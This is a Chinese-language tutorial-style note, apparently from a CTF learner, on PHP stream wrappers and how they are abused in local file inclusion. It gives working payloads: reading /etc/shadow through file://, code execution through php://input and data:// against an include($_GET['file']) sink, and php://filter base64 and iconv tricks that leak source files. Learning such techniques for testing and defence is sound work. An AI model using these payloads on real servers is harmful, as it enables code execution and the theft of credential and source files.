支持的协议：

file:// — 访问本地文件系统

http:// — 访问 HTTP (s) 网址

ftp:// — 访问 FTP (s) URLs

php:// — 访问各个输入 / 输出流（I/O streams）

zlib:// — 压缩流

data:// — 数据（RFC 2397）

glob:// — 查找匹配的文件路径模式

phar:// — PHP 归档

ssh2:// — 安全外壳协议 2

rar:// — RAR

ogg:// — 音频流

expect:// — 处理交互式的流

# file://

可以搭配 fopen ()，file_get_contents ()，include () 等函数搭配使用，支持相对、绝对和网络路径。但是我实测相对路径不用 file:// 读取，直接读就可以了

file://./index.php        #相对路径读取文件 #./index.php

file:///etc/shadow  #绝对路径读取

file://http://127.0.0.1/index.php   #网络路径读取

# http:// & https://

通过 HTTP 1.0 的 GET 方法访问网络资源

$homepage = file_get_contents("https://www.bilibili.com/");

echo $homepage;

# ftp://

这个还没弄懂怎么读，好像见的也比较少，先放放

# php://

# php://input

访问请求的原始数据的只读流，可以用来接收 post 的数据

$F = $_GET['file'];

include($F);

传 post

http://127.0.0.1/?file=php://input

POST DATA: <?php echo system('ls'); ?>

# php://output

是一个只写的数据流，可以像 echo 一样写入到输出中

$output = fopen("php://output", "w");

fwrite($output, "test");

fclose($output);

# php://filter

用法: php://filter/ 筛选过滤方式 /resource=<文件>

$F = "php://filter/read=convert.base64-encode/resource=t.php";

include($F);

字符串过滤器：

• string.rot13 # 等同于用 str_rot13 () 函数，将 26 个英文字母的前面 13 个字符与后 13 个字符互换 (PHP 4.3.0)

• string.toupper # 等同于用 strtoupper (), 将字符串转换为大写 (PHP 5.0.0)

• string.tolower # 同于用 strtolower ()，将字符串转换为小写 (PHP 5.0.0)

• string.strip_tags # 等同于用 strip_tags (), 从字符串中去除 html 和 php 标签 (PHP 5.0.0)

转换过滤器：

• convert.base64-encode

• convert.base64-decode

• convert.quoted-printable-encode# 将 8-bit 字符串转换为 quoted-printable 字符串。

• convert.quoted-printable-decode# 将 quoted-printable 字符串转换为 8-bit 字符串

• convert.iconv

  在激活 iconv 的前提下可以使用 convert.iconv.* 压缩过滤器， 等同于用 iconv() 处理所有的流数据。 该过滤器不支持参数，但可使用输入 / 输出的编码名称，组成过滤器名称，比如 convert.iconv.<input-encoding>.<output-encoding> 或 convert.iconv.<input-encoding>/<output-encoding>

  用法如上，当 rot 或者 base 被 ban 的时候可以通过修改字符编码的形式找出文件内容，可以使用类似 php://filter/convert.iconv..UCS-2LE/resource= 的方式弹出文件内容

压缩过滤器

• zlib.deflate 和 zlib.inflate # zlib.deflate 是用 zlib 进行文件流加密。zlib.inflate 是用 zlib 进行文件流解密

• bzip2.compress 和 bzip2.decompress # 同上

# zip:// & bzip2:// & zlib://

zip://, bzip2://, zlib:// 均属于压缩流，可以访问压缩文件中的子文件，更重要的是不需要指定后缀名

zip:// 处理的是 .zip 后缀的压缩包，compress.zlib:// 处理的是 .gz 后缀的压缩包，compress.bzip2:// 处理的是 .bz2 后缀的压缩包

zip://archive.zip#dir/file.txt

即 zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]** 要用绝对路径 + url 编码#

compress.bzip2:///etc/www/html/file.bz2

也可以相对路径

compress.bzip2://./file.bz2 #zlib 同理

# data://

data:// 资源类型；编码，内容 （data:// 也可以写成 data:）

data:// 协议通过执行资源类型，使后面的内容当做文件内容来执行，从而造成任意代码执行

?file=data://text/plain,<?php phpinfo(); ?>

# glob://

查找匹配的文件路径模式，需要搭配 DirectoryIterator 类

glob://[文件路径]/[文件名].[文件后缀]

$it = new DirectoryIterator($_GET['file']);

foreach($it as $f) {

 printf("%s", $f->getFilename());

	echo'</br>'; 

}

# phar://

和 zip 类似

phar://./php.zip/php.txt